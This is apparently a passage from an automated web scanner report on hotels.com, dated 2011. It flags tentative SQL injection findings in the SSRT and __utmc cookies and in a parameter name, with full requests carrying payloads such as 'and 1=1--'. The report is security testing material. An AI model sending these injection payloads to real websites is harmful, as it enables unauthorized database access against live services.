Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA17075075'%20or%201%3d1--%20; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.2.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA17075075'%20or%201%3d2--%20; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.14. http://www.hotels.com/compare/hotel_dockingbar.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.2.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:17 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:17 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:18 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.15. http://www.hotels.com/compare/hotel_dockingbar.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A108.1.0.i2%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:31 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjE5OC4yLjA6MTQ1LjAuMC5pMjoyMDAuMC4wOjEwOC4xLjAuaTI6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi42LjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4xLjAuaTF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:31 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
